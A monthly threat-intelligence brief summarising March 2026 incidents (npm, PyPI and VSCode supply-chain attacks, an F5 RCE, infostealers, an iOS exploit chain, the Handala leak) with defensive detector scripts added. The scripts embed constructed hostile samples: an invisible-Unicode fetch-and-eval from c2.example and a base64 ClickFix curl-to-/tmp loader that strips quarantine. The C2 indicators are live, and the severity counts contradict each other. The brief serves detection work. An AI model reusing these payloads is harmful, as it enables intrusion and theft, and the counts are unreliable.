March 2026 Threat Brief: 29 Incidents Across MENA, EU, UK & US

Mar 31, 2026 · 29 incidents · 20+ countries

CRITICAL CORROBORATED

By Karim El Labban · ZERO|TOLERANCE


THREAT BRIEF - MARCH 2026

March 2026 was the most operationally significant month in cybersecurity since the SolarWinds campaign disclosure in December 2020. Iran's Ministry of Intelligence and Security ran concurrent espionage, information warfare, and intimidation operations across at least four fronts - pre-positioning backdoors on US critical infrastructure, publishing a sitting FBI Director's personal emails, targeting Gulf energy supply chains, and orchestrating fabricated breach claims against defense contractors.

The Axios npm package - 100 million weekly downloads, present in 80% of cloud environments - was backdoored via a stolen maintainer token.

GlassWorm deployed a self-propagating worm across 433 components spanning VSCode, GitHub, and npm using Solana blockchain C2. Together with TeamPCP's three-link credential chain from Trivy through LiteLLM to Telnyx, three independent supply chain campaigns targeted developer infrastructure simultaneously - the worst month for software supply chain attacks on record.

Edge device zero-days in both F5 BIG-IP and Cisco Firepower Management Center were weaponized in the wild. The European Commission was breached twice in under two months.

And 676 million Social Security numbers sat exposed on the open internet because a vendor explicitly disabled Elasticsearch security. Twenty-nine incidents. Eighteen critical severity. More than twenty countries. Four regions.

ShinyHunters alone ran at least six confirmed attacks in a single month - TELUS, EU Commission, Infinite Campus, Aura, Woflow, and Figure - the most prolific single-actor campaign since Lapsus$ in 2022. The through line is not sophistication - it is the repeated failure to implement controls that have been documented, available, and recommended for years.

01

KEY FACTS

. 29 incidents tracked (19 CRITICAL, 12 HIGH)

. 20+ countries affected across MENA, United States, Europe, and United Kingdom

. Top threat actors: ShinyHunters/UNC6240 (5 attacks in brief, 6 including Figure standalone), Handala/Void Manticore (MOIS), MuddyWater/Seedworm (MOIS), TeamPCP, Interlock/Hive0163, UNC5221 (China-nexus), NasirSecurity, Anubis, DragonForce

. Total records confirmed exposed: 692+ million (676M Infutor SSNs + 6.8M Crunchyroll + 5.43M Companies House + 2.7M Navia + 903K Aura + 448K Lloyds)

. Total data volume claimed stolen: 1+ petabyte (TELUS alone) + 326GB (Woflow) + 375TB fabricated (APT IRAN)

. Key themes: ShinyHunters systematic SaaS campaign, Iran multi-front cyber escalation, supply chain credential chaining and npm ecosystem attacks, UK data protection failures, infostealer technical evolution, edge device exploitation, European institutional targeting, information operations vs real operations

Covering: March 1 - March 31, 2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. Axios npm Hijack: North Korea's UNC1069 Weaponized 100M Weekly Downloads via WAVESHAPER.V2

Global | UNC1069 / DPRK (BlueNoroff / Lazarus Group) | March 31, 2026

North Korean threat actor UNC1069 social-engineered the lead Axios maintainer by posing as open-source collaborators, hijacking both his npm and GitHub accounts, and publishing backdoored versions 1.14.1 and 0.30.4 within 39 minutes of each other.

Both injected plain-crypto-js - a malicious dependency pre-staged 18 hours before the attack - that deployed WAVESHAPER.V2, a cross-platform RAT targeting macOS, Windows, and Linux.

Axios has approximately 100 million weekly downloads, 2 million+ dependent packages, and is present in an estimated 80% of cloud environments (Wiz).

GTIG attributed the attack with high confidence based on WAVESHAPER.V2 malware lineage, AstrillVPN-linked C2 infrastructure, and SentinelOne corroboration via macOS binary naming.

Mandiant CTO Charles Carmakal confirmed "hundreds of thousands of stolen credentials" were harvested.

Socket.dev detected the malware within 6 minutes. npm unpublished both versions by ~03:15 UTC. In the approximately 3-hour exposure window, Wiz observed execution in 3% of affected environments.

Singapore CSA issued advisory AD-2026-002 - the first government advisory on the incident.

. Package: axios (npm) - ~100M weekly downloads, 2M+ dependents

. Actor: UNC1069 (GTIG) / BlueNoroff / Lazarus Group - DPRK-nexus, financially motivated

. Malware: WAVESHAPER.V2 (Mandiant taxonomy) - cross-platform RAT

. Malicious Versions: 1.14.1 (00:21 UTC) and 0.30.4 (01:00 UTC) - both branches hit in 39 minutes

. Vector: Social engineering of lead maintainer; npm/GitHub accounts hijacked

. C2: sfrclak[.]com / 142.11.206.73:8000 / campaign ID 6202033 / AstrillVPN infrastructure

. Detection: Socket.dev at 00:05:41 UTC (6 minutes); npm yanked by ~03:15 UTC

. Execution Rate: 3% of affected environments (Wiz)

. Downstream Impact: Hundreds of thousands of stolen credentials (Carmakal/Mandiant)

. Government Response: Singapore CSA advisory AD-2026-002

Sources: Google Cloud Blog, GTIG, Elastic Security Labs, SentinelOne, Mandiant, StepSecurity, Socket.dev, Snyk, Aikido Security, Wiz, Vercel, The Hacker News, The Record, SecurityWeek, SecurityAffairs, Help Net Security, The Register, Cybernews, Techzine Global, CNN, CyberScoop, TechCrunch, Mondoo, Sophos, Trend Micro, Bitdefender, Tenable, SANS Institute, Arctic Wolf, Malwarebytes, npm advisory, CSA Singapore

Full Analysis: https://zerotolerance.me/cyberthreats/axios-npm-supply-chain-attack-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

2. GlassWorm: 433 Compromised Components Across VSCode, GitHub, and npm

Global | Russian-speaking (assessed) | October 2025 - March 2026

A Russian-speaking threat actor deployed GlassWorm - a self-propagating worm spanning four developer ecosystems simultaneously - across 433 compromised components: 72 OpenVSX and VSCode Marketplace extensions, 151+ GitHub JavaScript/TypeScript repositories, approximately 200 GitHub Python repositories (via the ForceMemo sub-campaign), and 10 npm packages.

GlassWorm uses invisible Unicode characters in the variation selector and extended combining mark ranges to encode malicious payloads that render as blank space in every mainstream code editor and review interface.
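
One way to surface this class of smuggling on your own code base, as an added example (not GlassWorm's code and not any vendor's tool): the scanner below walks source text for runs of variation selectors and combining marks, which carry no glyph of their own, reports where each run sits, and decodes the variation-selector runs back to bytes. The byte mapping used here (VS1-VS16 to 0x00-0x0F, VS17-VS256 to 0x10-0xFF) is an assumption for illustration; the campaign's real encoding may differ. The hidden string and the sample JavaScript are constructed for the example.

```python
"""Detect invisible-Unicode payload smuggling in source text (added example)."""
import unicodedata

# Unicode Variation Selectors (VS1..VS16) and Variation Selectors Supplement (VS17..VS256).
# Both render as nothing on their own in editors and diff viewers.
VS_BASIC = range(0xFE00, 0xFE10)
VS_SUPP = range(0xE0100, 0xE01F0)


def vs_to_byte(ch):
    """Map one variation selector to a byte, or None if ch is not a variation selector.
    ASSUMED mapping: VS1..VS16 -> 0x00..0x0F, VS17..VS256 -> 0x10..0xFF (illustrative)."""
    cp = ord(ch)
    if cp in VS_BASIC:
        return cp - 0xFE00
    if cp in VS_SUPP:
        return cp - 0xE0100 + 16
    return None


def byte_to_vs(b):
    """Inverse of vs_to_byte; used only to build the constructed sample below."""
    return chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16)


def encode_payload(data):
    """Hide bytes as a run of variation selectors (the attacker side, for the sample)."""
    return "".join(byte_to_vs(b) for b in data)


def is_invisible_mark(ch):
    """Variation selectors and combining marks (categories Mn/Me) have no glyph of their own."""
    return vs_to_byte(ch) is not None or unicodedata.category(ch) in ("Mn", "Me")


def scan(text, min_run=4):
    """Return one finding per run of at least min_run invisible marks.

    Legitimate text rarely stacks more than one or two combining marks on a base
    character, so a long run is a strong signal. Each finding carries the line
    (1-based), column (0-based), run length and the bytes recovered from any
    variation selectors in the run (combining marks are skipped while decoding).
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        i = 0
        while i < len(line):
            if not is_invisible_mark(line[i]):
                i += 1
                continue
            j = i
            while j < len(line) and is_invisible_mark(line[j]):
                j += 1
            if j - i >= min_run:
                run = line[i:j]
                decoded = bytes(b for b in map(vs_to_byte, run) if b is not None)
                findings.append({"line": lineno, "col": i, "length": j - i, "decoded": decoded})
            i = j
    return findings


# Constructed sample: an innocuous-looking JS file with a hidden second-stage fetch
# appended after the semicolon on line 3. The payload text is made up for the example.
HIDDEN = b'fetch("https://c2.example/stage2").then(r=>r.text()).then(eval)'
SAMPLE_JS = (
    'const banner = "ok";\n'
    "function init() {\n"
    "  return 1;" + encode_payload(HIDDEN) + "\n"
    "}\n"
    "// caf\u00e9 and cafe\u0301 are normal text, not findings\n"
)

if __name__ == "__main__":
    for f in scan(SAMPLE_JS):
        print(f"line {f['line']} col {f['col']}: {f['length']} invisible code points -> {f['decoded']!r}")
```

Run it over a repository before review, not after: the whole point of the technique is that the diff viewer shows nothing. A pre-commit hook that rejects any run above the threshold is cheap, and legitimate combining marks in string literals will almost never reach four in a row.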

The decoded payloads query the Solana blockchain every five seconds for C2 instructions embedded as Base64-encoded JSON objects in transaction memo fields. Google Calendar events and BitTorrent DHT provide fallback C2 channels - making infrastructure takedown nearly impossible.

The final-stage ZOMBI RAT harvests npm, GitHub, OpenVSX, and Git credentials, which it uses to automatically compromise additional packages and extensions, creating a self-sustaining infection cycle.

ZOMBI targets 49 cryptocurrency wallet browser extensions and deploys SOCKS proxy servers and hidden VNC for persistent remote access.

StepSecurity documented 50 Solana C2 transactions between November 2025 and March 2026, with the attacker rotating through six payload server IPs. The March 2026 wave was coordinated across all four platforms simultaneously.

This is the third major supply chain campaign targeting developer infrastructure this month, alongside the Axios npm hijack and TeamPCP's credential chain. Two of the three rely on a public blockchain for command and control (GlassWorm on Solana, TeamPCP's CanisterWorm on ICP canisters); the Axios operation used conventional C2 infrastructure.

. Components: 433 total (72 extensions, 151+ GitHub JS/TS repos, ~200 GitHub Python repos, 10 npm packages)

. C2: Solana blockchain (primary), Google Calendar (fallback), BitTorrent DHT (tertiary)

. Solana Wallet: BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC (50 transactions)

. RAT: ZOMBI - credential theft, 49 crypto wallet extensions, HVNC, SOCKS proxy, WebRTC P2P

. Stealth: Invisible Unicode injection - payloads render as blank space (a relative of the Trojan Source technique, CVE-2021-42574, which abused bidirectional override characters rather than variation selectors)

. Self-Propagation: Harvested credentials used to compromise additional packages/repos

. Actor: Russian-speaking (high confidence) - Russian-language code comments, a locale-based execution skip, and an endpoint exposed by Koi Security

. Obfuscation: Three-layer - Base64, zlib, XOR (key 134)

Sources: Koi Security, Truesec, Aikido Security (Ilyas Makari), StepSecurity, Socket.dev, Sonatype, BleepingComputer, The Hacker News, SecurityWeek, Dark Reading, CSO Online, InfoWorld, Snyk, Veracode, Fluid Attacks, Malwarebytes, GBHackers, Cloud Security Alliance, Rescana, ThaiCERT, SOCRadar, Scientific American, HotHardware, WinBuzzer, WebProNews, Cybersecurity Help, HackMag, Dev.to, Threat Road (Substack)

Full Analysis: https://zerotolerance.me/cyberthreats/glassworm-supply-chain-campaign-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

3. F5 BIG-IP: Critical RCE Exploited in the Wild After Five-Month Misclassification

Global | UNC5221 (China-nexus) / Unknown | March 30, 2026

F5 reclassified BIG-IP Access Policy Manager vulnerability CVE-2025-53521 from denial-of-service (CVSS 7.5) to unauthenticated remote code execution (CVSS 9.8) in March 2026 - five months after the original October 2025 advisory.

Attackers are deploying memory-resident webshells on compromised devices, disabling SELinux protections, and tampering with sys-eicheck integrity checks to maintain persistent access.

CISA added the flaw to its Known Exploited Vulnerabilities catalog on March 27, ordering all federal agencies to patch by March 30. The vulnerability also lands on an already-compromised vendor: CISA's Emergency Directive ED-26-01 (October 2025) responded to a separate but related incident in which UNC5221 (China-nexus) breached F5's corporate network and exfiltrated BIG-IP source code. Shadowserver Foundation tracks over 240,000 BIG-IP instances exposed to the public internet.

The five-month misclassification meant organizations that deprioritized a "DoS-only" patch were unknowingly running systems vulnerable to unauthenticated RCE. This is a textbook example of how advisory misclassification creates systemic risk.

. CVE: CVE-2025-53521 (CVSS v3.1: 9.8, CVSS v4.0: 9.3)

. Affected: BIG-IP APM versions 17.5.0-17.5.1, 17.1.0-17.1.2, 16.1.0-16.1.6, 15.1.0-15.1.10

. Reclassification: DoS to unauthenticated RCE after 5 months

. Exposure: 240,000+ BIG-IP instances internet-exposed (Shadowserver)

. CISA KEV: Added March 27; remediation deadline March 30

. F5 Corporate Breach: UNC5221 (China-nexus) stole source code (October 2025)

Sources: BleepingComputer, Help Net Security, CISA KEV Catalog, CISA Emergency Directive ED-26-01, CISA/NSA/Canadian Cyber Centre Malware Analysis Report AR25-338A (December 2025), F5 Security Advisory K000156741, F5 Supplemental IOC Document K000160486, UK National Cyber Security Centre, Dutch National Cyber Security Center, New Zealand NCSC, Canadian Centre for Cyber Security, Resecurity, RH-ISAC, Shadowserver Foundation, NVD (NIST), watchTowr (Benjamin Harris), Defused Cyber, CyberDaily, SecurityAffairs, Zscaler, Rapid7

Full Analysis: https://zerotolerance.me/cyberthreats/f5-big-ip-cve-2025-53521-rce-exploitation

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

4. VoidStealer v2.0: First Infostealer to Bypass Chrome ABE via Hardware Breakpoints

Global | VoidStealer MaaS | March 29, 2026

VoidStealer v2.0 became the first infostealer observed in the wild to bypass Google Chrome's Application-Bound Encryption (ABE) without code injection or privilege escalation.

The technique, disclosed by Gen Digital researcher Vojtech Krejsa on March 19, uses hardware breakpoints via CPU debug registers (DR0/DR7) to intercept Chrome's v20_master_key at the exact moment it exists in plaintext during the os_crypt::DecryptAppBoundString execution flow.

The malware spawns a hidden, suspended Chrome or Edge process, attaches to it as a debugger, sets hardware breakpoints on every browser thread, and, when a breakpoint fires, reads the pointer to the freshly decrypted key out of the R15 register (Chrome) or R14 register (Edge) and copies the key bytes with ReadProcessMemory.

The nine prior stealer families that bypassed ABE within 45 days of its July 2024 release all relied on code injection into the browser. VoidStealer's technique writes zero bytes to browser memory, so memory integrity checks have nothing to detect; the debugger attachment to the browser process is the main observable artifact left behind.

The technique was adapted from the open-source ElevationKatz project on GitHub. VoidStealer has undergone 12 iterations from v1.0 (December 2025) to v2.1 (March 2026), demonstrating the rapid development cycle of modern MaaS infostealers.

. Malware: VoidStealer v2.0 (MaaS) - ABE bypass introduced March 13, 2026

. Technique: Hardware breakpoints via DR0/DR7 debug registers - no injection, no escalation

. Key Extraction: pointer to v20_master_key read from R15 (Chrome) or R14 (Edge) at the breakpoint; key bytes copied out with ReadProcessMemory

. Browser Scope: 20+ Chromium and Gecko-based browsers

. Versions: 12 iterations in 3 months (v1.0 Dec 2025 to v2.1 Mar 2026)

Sources: Gen Digital, BleepingComputer, CSO Online, Computerworld, CybersecurityNews, CyberPress, Cryptika, GBHackers, BlackFog, Elastic Security Labs, SpyCloud, SpecterOps, PCRisk, Xcitium ThreatLabs, The Hacker News, Arabian Post, GitHub (Meckazin/ChromeKatz, xaitax), Google Chrome Developer Documentation, ZERO|TOLERANCE prior coverage (Infiniti Stealer macOS ClickFix Nuitka)

Full Analysis: https://zerotolerance.me/cyberthreats/voidstealer-chrome-abe-bypass-hardware-breakpoints

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

5. Infiniti Stealer: First macOS Infostealer Combining ClickFix Delivery with Nuitka-Compiled Python

macOS / Global | Unknown | March 28, 2026

Malwarebytes disclosed Infiniti Stealer as the first documented macOS campaign combining ClickFix social engineering delivery with a Python 3.11 infostealer compiled via the Nuitka compiler into a native Mach-O binary.

The malware is delivered through a fake Cloudflare CAPTCHA page that tricks users into pasting a base64-obfuscated curl command into macOS Terminal. The command writes a stage-2 loader to /tmp, strips the macOS quarantine attribute, executes via nohup, and self-destructs.
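
The pasted command is the one moment this chain is visible in a shell history or a process-execution event, which makes it worth scoring. The detector below is an added example (not Malwarebytes' detection logic and not the campaign's code): it weights the tells a ClickFix paste tends to carry (base64 decode piped to a shell, curl into a shell, quarantine-attribute removal, /tmp staging, nohup, self-deletion, and the fake-CAPTCHA comment that the lure appends so the victim sees something reassuring), and it unwraps an `echo <base64> | base64 -d` layer so the inner command is scored too. The weights, threshold, regexes and sample commands are all constructed for the example; the second-stage command is built in the block, not taken from the campaign.

```python
"""Flag ClickFix-style terminal commands in shell history or process events (added example)."""
import base64
import re

# (name, regex, weight). Weights are illustrative, not from the original report.
INDICATORS = [
    ("curl", re.compile(r"\bcurl\b"), 1),
    ("pipe_to_shell", re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b"), 2),
    ("shell_c_curl", re.compile(r"(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*curl"), 2),
    ("base64_decode", re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"), 2),
    ("quarantine_strip", re.compile(r"\bxattr\b.*com\.apple\.quarantine"), 3),
    ("tmp_stage", re.compile(r"/(?:private/)?(?:tmp|var/tmp)/"), 1),
    ("nohup_background", re.compile(r"\bnohup\b"), 1),
    ("self_delete", re.compile(r"\brm\s+-r?f\s+\"?\$0\"?"), 2),
    ("captcha_marker", re.compile(r"#.*(?:not a robot|verification id|cloudflare|ray id)", re.I), 3),
]
# The outer wrapper ClickFix lures use: echo "<base64>" | base64 -d | sh
B64_ECHO = re.compile(r"echo\s+[\"']?([A-Za-z0-9+/=]{16,})[\"']?\s*\|\s*base64\s+(?:-d|-D|--decode)")


def indicators_for(text):
    """Return the (name, weight) pairs whose regex matches the text."""
    return [(name, w) for name, rx, w in INDICATORS if rx.search(text)]


def analyze(cmd, threshold=5):
    """Score one command line. If it carries an echo|base64 -d wrapper, decode the
    payload and score that as well, prefixing inner indicators with "inner:"."""
    hits = indicators_for(cmd)
    inner = None
    m = B64_ECHO.search(cmd)
    if m:
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            inner = None
    if inner is not None:
        hits += [("inner:" + name, w) for name, w in indicators_for(inner)]
    score = sum(w for _, w in hits)
    return {
        "score": score,
        "indicators": [name for name, _ in hits],
        "inner": inner,
        "verdict": "clickfix_suspect" if score >= threshold else "benign",
    }


# Constructed samples. STAGE2 is a made-up second-stage command; nothing here is live.
STAGE2 = (
    "curl -fsSL https://example.invalid/s2 -o /tmp/.s2 && "
    "xattr -d com.apple.quarantine /tmp/.s2 && nohup /tmp/.s2 >/dev/null 2>&1 &"
)
CLICKFIX = (
    'echo "' + base64.b64encode(STAGE2.encode()).decode() + '" | base64 -d | sh'
    "  # I am not a robot - reCAPTCHA Verification ID: 7291"
)
HOMEBREW = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
BENIGN = "ls -la ~/Downloads"

if __name__ == "__main__":
    for c in (CLICKFIX, HOMEBREW, BENIGN):
        r = analyze(c)
        print(r["verdict"], r["score"], r["indicators"])
```

The Homebrew installer is included deliberately: curl-into-bash alone lands below the threshold, because that pattern is common in legitimate developer workflows. What separates the lure is the combination, above all the trailing "verification" comment and the quarantine strip hidden inside the base64 layer, which is why the inner command is scored rather than ignored.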

The 8.6MB Nuitka-compiled Mach-O loader decompresses a 35MB zstd archive containing the final payload, which targets Chromium and Firefox credentials, the macOS Keychain, cryptocurrency wallets, and .env files. It performs anti-analysis checks for VMware, VirtualBox, and sandbox environments.

The Nuitka compilation produces a native binary with no obvious bytecode layer, making reverse engineering significantly harder than PyInstaller alternatives. This campaign arrives amid a 101% increase in macOS infostealer detections reported by Unit 42.

. Malware: Infiniti Stealer (formerly NukeChain) - Nuitka-compiled Python 3.11 Mach-O

. Delivery: ClickFix technique - fake Cloudflare CAPTCHA

. Targets: Chromium + Firefox credentials, macOS Keychain, crypto wallets, .env files

. Anti-Analysis: VM/sandbox detection, randomized execution delay

. Context: 101% increase in macOS stealer detections (Unit 42); 500%+ ClickFix surge 2024-2025

Sources: Malwarebytes, BleepingComputer, CybersecurityNews, GBHackers, Cryptika, Cyber Security Review, Sophos X-Ops, Recorded Future, Palo Alto Networks Unit 42, Microsoft Security Blog, Cyble, Intego, Red Canary, SentinelOne, Check Point Research, Kaspersky

Full Analysis: https://zerotolerance.me/cyberthreats/infiniti-stealer-macos-clickfix-nuitka

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

6. Telnyx SDK Backdoored on PyPI: TeamPCP Hides Credential Stealer in WAV Audio Files

Global | TeamPCP | March 27, 2026

TeamPCP backdoored the Telnyx Python SDK - the official PyPI package for an enterprise communications platform serving Cisco, Philips, and Red Cross - by publishing malicious versions 4.87.1 and 4.87.2 using PyPI credentials stolen during the LiteLLM compromise three days earlier.

This is the third and final link in the Trivy-LiteLLM-Telnyx credential chain. The malicious code introduced a new technique: WAV audio file steganography.

Rather than embedding payloads as base64 blobs, TeamPCP concealed executable code inside the frame data of valid WAV audio files. The files pass MIME-type checks and appear as harmless audio to network inspection tools.

On Windows, the malware extracts a persistent binary from hangup.wav and drops it in the Startup folder.

On Linux and macOS, it extracts a credential harvester from ringtone.wav that sweeps SSH keys, cloud credentials, Kubernetes secrets, Docker and npm tokens, database credentials, and cryptocurrency wallets.
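
A valid WAV container tells an inspection tool nothing about what the sample bytes are, so the practical check is to look inside the frame data for what should not be there. The script below is an added example (not TeamPCP's code and not any vendor's detector): it builds a structurally valid PCM WAV around an XOR-encoded fake executable, then, for every single-byte XOR key, searches the frame data for the transformed executable magic rather than decoding the whole buffer 256 times. The two-byte PE magic is only accepted when the DOS stub string follows, which keeps ordinary audio from matching. The fake ELF header, the key 0x5A and the layout are constructed for the example; the campaign's real key scheme is not known from this brief.

```python
"""Detect XOR-encoded executables hidden in WAV frame data (added example)."""
import io
import wave

# Executable magics to look for once a candidate XOR key is applied.
MAGICS = {
    b"\x7fELF": "ELF",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xca\xfe\xba\xbe": "Mach-O universal",
    b"MZ": "PE",
}
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def build_wav(frames, channels=1, sampwidth=2, rate=8000):
    """Wrap raw sample bytes in a valid PCM WAV (used here only to build the sample)."""
    block = channels * sampwidth
    if len(frames) % block:
        frames += b"\x00" * (block - len(frames) % block)
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(channels)
        w.setsampwidth(sampwidth)
        w.setframerate(rate)
        w.writeframes(frames)
    return buf.getvalue()


def wav_frames(blob):
    """Return the raw sample data of a WAV; wave.Error is raised if the container is malformed."""
    with wave.open(io.BytesIO(blob), "rb") as w:
        return w.readframes(w.getnframes())


def find_xored_executables(blob):
    """For each single-byte key, search the frames for (magic XOR key).

    An embedded magic M encoded with key k appears in the frames as M ^ k, so we
    search for that pattern directly. Each hit reports the frame offset, the key and
    the executable kind.
    """
    frames = wav_frames(blob)
    hits = []
    for key in range(256):
        for magic, kind in MAGICS.items():
            pattern = xor_bytes(magic, key)
            start = 0
            while True:
                off = frames.find(pattern, start)
                if off < 0:
                    break
                start = off + 1
                if kind == "PE":
                    # Two bytes match by chance often; require the DOS stub text close by.
                    if DOS_STUB not in xor_bytes(frames[off:off + 256], key):
                        continue
                hits.append({"offset": off, "key": key, "kind": kind})
    return hits


def extract(blob, offset, key, length):
    """Recover `length` bytes of the hidden payload starting at a reported offset."""
    return xor_bytes(wav_frames(blob)[offset:offset + length], key)


# Constructed sample: 100 samples of silence, a fake ELF header plus body XORed with
# 0x5A, then more silence. The body is plain text; nothing here is a real binary.
FAKE_ELF = b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 + b"constructed fake elf body for the example"
SAMPLE_KEY = 0x5A
SAMPLE_WAV = build_wav(b"\x00" * 200 + xor_bytes(FAKE_ELF, SAMPLE_KEY) + b"\x00" * 200)

if __name__ == "__main__":
    for h in find_xored_executables(SAMPLE_WAV):
        print(h, extract(SAMPLE_WAV, h["offset"], h["key"], 4))
```

Single-byte XOR is the cheapest case; a multi-byte key defeats this exact search but not the underlying idea, which is to treat audio shipped inside a source package as data to be inspected rather than trusted on its MIME type. The stronger policy question the incident raises is why an SDK needs binary media files at all.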

The first version shipped with a case-sensitivity typo that rendered the payload non-functional; TeamPCP corrected it in 16 minutes, indicating active monitoring. PyPI quarantined both versions within 6 hours 22 minutes.

. Malicious Versions: telnyx 4.87.1 (broken), 4.87.2 (functional)

. Monthly Downloads: 730,000

. Exposure Window: 6 hours 22 minutes

. New TTP: WAV audio file steganography (XOR-encrypted payloads in WAV frame data)

. Attribution: TeamPCP (HIGH confidence) - identical RSA-4096 key, tpcp.tar.gz naming

. Campaign Position: Link 3 of 3 (Trivy - LiteLLM - Telnyx)

Sources: Datadog Security Labs, SafeDep, JFrog, Aikido Security, The Hacker News, BleepingComputer, Help Net Security, Infosecurity Magazine, CyberSecurityNews, ReversingLabs, SANS Internet Storm Center (Updates 002 and 003), SANS Institute, Cybernews, Telnyx Security Notice, GitHub Issue #235, pypistats.org, Palo Alto Networks, GitGuardian, Endor Labs, Socket.dev, ZERO|TOLERANCE prior coverage (Trivy Supply Chain CVE-2026-33634, LiteLLM TeamPCP PyPI Supply Chain)

Full Analysis: https://zerotolerance.me/cyberthreats/teampcp-telnyx-pypi-wav-steganography

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

7. Handala Publishes 300+ Emails from FBI Director Patel's Personal Gmail

USA | Handala / Void Manticore / MOIS | March 27-29, 2026

Iran's MOIS-backed Handala published more than 300 emails, personal photographs, and documents stolen from FBI Director Kash Patel's personal Gmail account. TechCrunch verified authenticity by examining DKIM cryptographic signatures in message headers.

A DOJ official separately confirmed to Reuters that the account was breached and the posted material appeared authentic.

The leaked content spans February 2010 to 2022, including travel correspondence, family messages, photos from a trip to Cuba, and a 2016 resume noting a classified CIA award.

One 2014 email shows Patel forwarding DOJ correspondence to his personal Gmail while serving as a national security prosecutor - a practice that violates federal information security policy.

Handala framed the operation as direct retaliation for the March 19 DOJ seizure of four Handala domains and the State Department's $10 million Rewards for Justice bounty. Patel's Gmail appeared in 11 prior data breaches on Have I Been Pwned.

Security researchers assessed credential stuffing or password reuse as the likely compromise vector.

This represents the third major Handala operation in March (medical device company, Lockheed Martin engineers, FBI Director) - an unprecedented escalation tempo for a single MOIS-backed group.

. Leaked Data: 300+ personal emails, photographs, documents (Feb 2010 - 2022)

. Target: FBI Director Kash Patel's personal Gmail (not government systems)

. Authentication: DKIM-verified by TechCrunch; DOJ confirmed to Reuters

. HIBP Exposure: Gmail address found in 11 prior data breaches

. Assessed Vector: Credential stuffing / password reuse

. Motivation: Retaliation for DOJ domain seizure and $10M bounty

. Escalation Arc: Medical device company (Mar 11) - Lockheed Martin engineers (mid-Mar) - FBI Director (Mar 27)

Sources: NBC News, CNN, TechCrunch, Axios, PBS/AP, CBS News, Reuters, Al Jazeera, CNBC, Fox News, Newsweek, Fortune, GV Wire, SiliconANGLE, SecurityAffairs, Check Point Research, GovInfoSecurity, Cyberwarzone, Risky Business, Lawfare, Haaretz, Jerusalem Post, Engadget, Techlicious, This Week in Security, Cyber Daily, FBI.gov, DOJ Office of Public Affairs, ZERO|TOLERANCE prior coverage

Full Analysis: https://zerotolerance.me/cyberthreats/handala-fbi-director-patel-gmail-hack

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

8. DarkSword: iOS Zero-Day Exploit Chain Targets Saudi, Turkey, Malaysia, Ukraine

Saudi Arabia / Turkey / Malaysia / Ukraine | UNC6748, PARS Defense, UNC6353 | March 26, 2026

Google Threat Intelligence Group, iVerify, and Lookout identified DarkSword - a full iOS exploit chain using 6 vulnerabilities including 3 zero-days (CVE-2026-20700, CVE-2025-43529, CVE-2025-14174) to achieve complete iPhone device compromise.

Three independent operators deployed DarkSword since November 2025: UNC6748 (financially motivated, Saudi Arabia), PARS Defense (Turkish commercial surveillance vendor, Turkey and Malaysia), and UNC6353 (suspected Russian espionage, Ukraine).

DarkSword operates as a non-persistent smash-and-grab infostealer targeting messages, credentials, and cryptocurrency wallets.

On March 23, 2026, the full exploit kit was leaked on GitHub. All vulnerabilities were patched by Apple between mid-2025 and February 2026, but an estimated 270 million iPhones remained on vulnerable iOS versions at time of disclosure.

Apple Lockdown Mode was confirmed effective on unpatched devices. The leak transforms a targeted surveillance tool into a commodity exploit available to any actor with moderate technical capability.

. Vulnerabilities: 6 (3 zero-days) across iOS 18.4 through 18.7

. Malware Families: GHOSTBLADE, GHOSTKNIFE, GHOSTSABER

. Countries: Saudi Arabia, Turkey, Malaysia, Ukraine

. Exploit Kit: Leaked on GitHub March 23, 2026

. Vulnerable Devices: ~270 million iPhones on unpatched iOS versions

Sources: Google Cloud Blog (GTIG), iVerify, Lookout, The Hacker News, BleepingComputer, Help Net Security, SecurityWeek, Dark Reading, TechCrunch, CyberScoop, Apple Security Advisories, CISA KEV, Malwarebytes, WinBuzzer

Full Analysis: https://zerotolerance.me/cyberthreats/darksword-ios-exploit-chain-saudi

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

9. Navia Benefit Solutions: 2.7M Records Exposed via BOLA API Flaw

USA | Unknown | March 26, 2026

A Broken Object Level Authorization (BOLA) vulnerability in Navia Benefit Solutions' API exposed 2,697,540 benefit plan participant records over a 24-day intrusion window from December 22, 2025 to January 15, 2026. Navia administers FSAs, HRAs, COBRA, and HSAs for over 10,000 employer clients.

Exposed data includes Social Security numbers, dates of birth, addresses, enrollment records, dependent information, and seven years of benefit plan participation history dating to 2018.

Among the downstream victims: 287 HackerOne employees and approximately 35,600 Washington State health plan members. HackerOne publicly criticized Navia for notification delays exceeding six weeks. At least nine federal class action lawsuits have been filed.

BOLA is the number one vulnerability on OWASP's API Security Top 10, and this incident demonstrates how a single API authorization flaw in a benefits administrator can cascade SSNs across thousands of employer organizations.
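
What a BOLA looks like in code, as an added example that is not Navia's code base (the brief does not describe their implementation): a record-lookup handler that authenticates the caller but never asks whether the caller may see the object it was asked for, beside the same handler with an object-level check, and a small loop showing what an attacker does with the gap. The records, tenant layout, role names and helper names are constructed for the example.

```python
"""BOLA in a benefits API: the vulnerable handler beside its hardened form (added example)."""
from dataclasses import dataclass


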